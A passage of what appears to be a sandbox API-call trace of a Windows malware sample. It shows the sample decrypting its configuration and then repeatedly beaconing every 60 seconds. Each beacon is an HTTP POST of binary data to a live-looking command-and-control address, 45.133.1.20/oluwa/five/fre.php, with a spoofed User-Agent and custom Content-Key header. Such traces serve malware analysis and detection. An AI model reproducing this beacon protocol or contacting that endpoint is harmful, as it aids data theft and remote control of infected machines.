out: hHeap=0x6a0000) returned 1 [0286.063] closesocket (s=0xa80) returned 0 [0286.064] GetProcessHeap () returned 0x6a0000 [0286.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0286.064] GetProcessHeap () returned 0x6a0000 [0286.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0286.065] GetProcessHeap () returned 0x6a0000 [0286.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0286.065] GetProcessHeap () returned 0x6a0000 [0286.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0286.066] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x9b8) returned 0xa80 [0286.068] Sleep (dwMilliseconds=0xea60) [0286.072] GetProcessHeap () returned 0x6a0000 [0286.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0286.073] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.074] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0286.084] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.084] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0286.094] GetProcessHeap () returned 0x6a0000 [0286.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0286.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.095] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0286.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.097] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0286.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.098] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0286.098] GetProcessHeap () returned 0x6a0000 [0286.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0286.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.100] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0286.101] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.109] CryptDestroyKey (hKey=0x6ad020) returned 1 [0286.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.111] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0286.111] GetProcessHeap () returned 0x6a0000 [0286.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0286.112] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.115] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0286.116] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.116] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0286.117] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.118] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0286.118] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.119] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0286.119] GetProcessHeap () returned 0x6a0000 [0286.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0286.119] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0286.119] GetProcessHeap () returned 0x6a0000 [0286.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0286.120] GetProcessHeap () returned 0x6a0000 [0286.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0286.120] GetProcessHeap () returned 0x6a0000 [0286.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0286.121] GetProcessHeap () returned 0x6a0000 [0286.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0286.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.122] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0286.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.132] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0286.142] GetProcessHeap () returned 0x6a0000 [0286.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0286.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.143] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0286.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.144] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0286.149] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.150] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0286.150] GetProcessHeap () returned 0x6a0000 [0286.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0286.151] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.151] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0286.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.152] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0286.153] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.154] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0286.154] GetProcessHeap () returned 0x6a0000 [0286.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0286.154] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.155] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0286.155] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.156] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0286.158] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.159] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0286.160] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.160] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0286.160] GetProcessHeap () returned 0x6a0000 [0286.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0286.160] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0286.160] GetProcessHeap () returned 0x6a0000 [0286.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa10 [0286.160] socket (af=2, type=1, protocol=6) returned 0xa84 [0286.160] connect (s=0xa84, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0286.202] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0286.202] GetProcessHeap () returned 0x6a0000 [0286.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0286.202] GetProcessHeap () returned 0x6a0000 [0286.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9318 [0286.203] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0286.204] wvsprintfA (in: param_1=0x6d9318, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0286.204] GetProcessHeap () returned 0x6a0000 [0286.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9930 [0286.204] GetProcessHeap () returned 0x6a0000 [0286.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0286.206] GetProcessHeap () returned 0x6a0000 [0286.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0286.206] GetProcessHeap () returned 0x6a0000 [0286.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9318 [0286.207] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0286.208] wvsprintfA (in: param_1=0x6d9318, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0286.208] GetProcessHeap () returned 0x6a0000 [0286.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0286.208] GetProcessHeap () returned 0x6a0000 [0286.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0286.209] send (s=0xa84, buf=0x6bd460*, len=242, flags=0) returned 242 [0286.210] send (s=0xa84, buf=0x6bb998*, len=159, flags=0) returned 159 [0286.210] GetProcessHeap () returned 0x6a0000 [0286.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0286.210] recv (in: s=0xa84, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0286.280] GetProcessHeap () returned 0x6a0000 [0286.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0286.280] GetProcessHeap () returned 0x6a0000 [0286.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0286.281] GetProcessHeap () returned 0x6a0000 [0286.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9930 | out: hHeap=0x6a0000) returned 1 [0286.281] GetProcessHeap () returned 0x6a0000 [0286.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0286.282] closesocket (s=0xa84) returned 0 [0286.282] GetProcessHeap () returned 0x6a0000 [0286.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa10 | out: hHeap=0x6a0000) returned 1 [0286.283] GetProcessHeap () returned 0x6a0000 [0286.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0286.283] GetProcessHeap () returned 0x6a0000 [0286.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0286.283] GetProcessHeap () returned 0x6a0000 [0286.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0286.284] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xf3c) returned 0xa84 [0286.286] Sleep (dwMilliseconds=0xea60) [0286.288] GetProcessHeap () returned 0x6a0000 [0286.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0286.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.290] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0286.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.298] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0286.307] GetProcessHeap () returned 0x6a0000 [0286.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0286.308] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.308] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0286.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.310] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0286.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.314] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0286.314] GetProcessHeap () returned 0x6a0000 [0286.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0286.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.316] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0286.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.318] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0286.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.319] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0286.319] GetProcessHeap () returned 0x6a0000 [0286.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0286.320] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.329] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0286.330] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.331] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0286.332] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.332] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0286.337] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.338] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0286.338] GetProcessHeap () returned 0x6a0000 [0286.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0286.338] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0286.338] GetProcessHeap () returned 0x6a0000 [0286.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0286.339] GetProcessHeap () returned 0x6a0000 [0286.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0286.339] GetProcessHeap () returned 0x6a0000 [0286.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0286.340] GetProcessHeap () returned 0x6a0000 [0286.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0286.341] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.341] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0286.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.348] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0286.359] GetProcessHeap () returned 0x6a0000 [0286.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0286.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.360] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0286.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.362] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0286.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.363] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0286.363] GetProcessHeap () returned 0x6a0000 [0286.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0286.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.365] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0286.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.368] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0286.369] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.369] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0286.369] GetProcessHeap () returned 0x6a0000 [0286.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0286.370] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.370] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0286.371] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.371] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0286.373] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.373] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0286.373] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.374] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0286.374] GetProcessHeap () returned 0x6a0000 [0286.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0286.374] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0286.374] GetProcessHeap () returned 0x6a0000 [0286.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa70 [0286.374] socket (af=2, type=1, protocol=6) returned 0xa88 [0286.374] connect (s=0xa88, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0286.399] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0286.399] GetProcessHeap () returned 0x6a0000 [0286.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0286.400] GetProcessHeap () returned 0x6a0000 [0286.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9318 [0286.400] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0286.401] wvsprintfA (in: param_1=0x6d9318, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0286.401] GetProcessHeap () returned 0x6a0000 [0286.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9c30 [0286.401] GetProcessHeap () returned 0x6a0000 [0286.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0286.402] GetProcessHeap () returned 0x6a0000 [0286.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0286.402] GetProcessHeap () returned 0x6a0000 [0286.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9318 [0286.403] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0286.404] wvsprintfA (in: param_1=0x6d9318, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0286.404] GetProcessHeap () returned 0x6a0000 [0286.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0286.404] GetProcessHeap () returned 0x6a0000 [0286.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0286.405] send (s=0xa88, buf=0x6bd460*, len=242, flags=0) returned 242 [0286.405] send (s=0xa88, buf=0x6bb998*, len=159, flags=0) returned 159 [0286.405] GetProcessHeap () returned 0x6a0000 [0286.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0286.405] recv (in: s=0xa88, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0286.480] GetProcessHeap () returned 0x6a0000 [0286.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0286.481] GetProcessHeap () returned 0x6a0000 [0286.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0286.482] GetProcessHeap () returned 0x6a0000 [0286.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9c30 | out: hHeap=0x6a0000) returned 1 [0286.482] GetProcessHeap () returned 0x6a0000 [0286.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0286.483] closesocket (s=0xa88) returned 0 [0286.483] GetProcessHeap () returned 0x6a0000 [0286.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa70 | out: hHeap=0x6a0000) returned 1 [0286.484] GetProcessHeap () returned 0x6a0000 [0286.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0286.485] GetProcessHeap () returned 0x6a0000 [0286.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0286.485] GetProcessHeap () returned 0x6a0000 [0286.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0286.486] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: 